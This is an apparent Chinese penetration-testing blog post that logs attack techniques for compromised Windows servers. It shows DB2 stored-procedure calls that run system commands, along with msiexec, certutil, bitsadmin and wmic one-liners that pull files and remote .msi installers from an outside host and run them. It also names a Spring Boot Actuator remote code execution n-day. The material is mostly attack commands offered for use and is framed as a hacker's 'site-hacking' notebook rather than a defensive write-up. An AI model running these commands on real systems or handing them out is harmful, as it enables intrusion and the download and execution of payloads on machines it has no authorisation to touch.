首页 > 渗透测试 > 日常渗透测试搞站记录
2020
07-23

日常渗透测试搞站记录

DB2 数据库权限执行系统命令

记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口:

1、创建一个临时的表

2、创建存储过程(windows)

3、使用创建的存储过程db2_cmd_exec执行系统命令

CALL db2_cmd_exec ('dir D:\web\ > c:\whoami.log')

4、读取命令执行结果日志文件,写入到创建好的临时表中

CALL ADMIN_CMD('IMPORT FROM c:\whoami.log OF DEL INSERT INTO 表名')

msiexec在渗透中的使用

遇到一个台dns都不能出网的windows服务器,最后使用msiexec.exe从远程下载,居然可以出网,没搞明白啥原因。

msiexec.exe /i http://www.nxadmin.com/xxx.msi

命令执行之后,会自动加载远程.msi文件,并运行,只能加载运行.msi文件

其它一些命令的使用

certutil -urlcache -split -f http://www.nxadmin.com/xxxx.txt c:\xxxx.txt

bitsadmin /rawreturn /transfer getfile http://www.nxadmin.com/xxxx.msi c:\xxxx.msi

wmic os get /FORMAT:"http://www.nxadmin.com"

用到的一些nday漏洞

Spring Boot Actuator未授权访问远程代码执行漏洞

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。